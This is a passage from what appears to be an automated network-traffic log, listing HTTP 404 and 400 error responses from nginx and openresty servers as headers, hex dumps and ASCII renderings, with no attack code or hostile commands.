3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a paddi
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Fri, 23 Aug 2024 16:47:20 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32 33 20 41 75 67 20 32 30 32 34 20 31 36 3a 34 37 3a 32 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a paddi
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 16:47:38 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 16:47:39 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 23 Aug 2024 16:47:51 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 23 Aug 2024 16:47:51 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 16:47:53 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 16:47:53 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Fri, 23 Aug 2024 16:48:25 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32 33 20 41 75 67 20 32 30 32 34 20 31 36 3a 34 38 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a paddi
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Fri, 23 Aug 2024 16:48:27 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32 33 20 41 75 67 20 32 30 32 34 20 31 36 3a 34 38 3a 32 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a paddi
